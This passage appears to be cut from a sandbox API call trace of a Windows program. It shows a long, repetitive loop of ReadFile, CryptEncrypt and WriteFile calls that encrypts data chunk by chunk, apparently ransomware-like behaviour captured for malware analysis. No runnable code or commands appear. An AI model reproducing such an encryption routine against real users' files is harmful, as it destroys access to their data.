hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.862] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.862] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.862] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.863] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.863] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.863] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.863] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.863] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.864] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.864] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.864] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.864] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.864] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.865] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.865] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.865] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.865] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.865] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.866] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.866] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.866] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.866] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.866] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.866] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.867] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.867] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.867] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.867] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.867] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.868] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.868] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.868] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.868] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.869] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.869] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.869] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.869] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.869] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.870] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, 